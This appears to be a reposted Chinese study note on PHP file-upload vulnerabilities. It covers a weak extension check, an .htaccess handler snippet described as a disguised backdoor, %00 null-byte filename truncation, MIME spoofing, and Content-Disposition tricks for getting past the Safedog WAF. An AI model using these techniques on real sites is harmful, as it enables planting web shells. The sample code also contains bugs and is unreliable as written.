文件上传漏洞

<form action="" method="post" enctype="multipart/from-data" >
<input type="file" value="文件" name="sc">
<input type="submit" value="上传">
</form>
<?php
$type = $_FILES['SC']['type'];
/*
if($type=="image/jpeg"){
  echo "success";
            }
  else{
    echo "fail";
    }
  echo $name;
*/

$namearray=explode(".",$name);
if($namearray[1]=="jpg"){
echo "success";
}
else{
echo "fail";
}

?>

.htaccess攻击

  (上传漏洞)
  (伪装后门)
   <FilesMatch "xiao">
    SetHandler application/x-httpd-php
   </FilesMatch>


%00截断上传 判断文件后缀  访问地址url问题

  www.xxx.com/qq.jpg
  www.xxx.com/qq.php%00.jpg
  filename="123.php%00.jpg"
  将 %00 进行编码


上传类型修改上传 判断文件类型 mime

  Content-Type:image/jpeg

js绕过上传

  时间长短判断,看源代码

安全狗上传bypass研究

  Xss漏洞原理及利用方法

上传数据包:

  Content-Disposition: form-data; name="upfile"; filename=x.php;

    Content-Type: image/jpeg

     Content-Disposition:

    Name:上传数据包参数名(不能修改)

    Filename:文件名

    Content-Type:文件类型信息

  1.修改filename值,去掉双引号加上分号(双引号去掉,不让他上传值,加分号就是表示没有结束,让狗继续匹配)

  2.删除Content-Disposition的值

 

转载于:https://www.cnblogs.com/China-Waukee/p/9642772.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值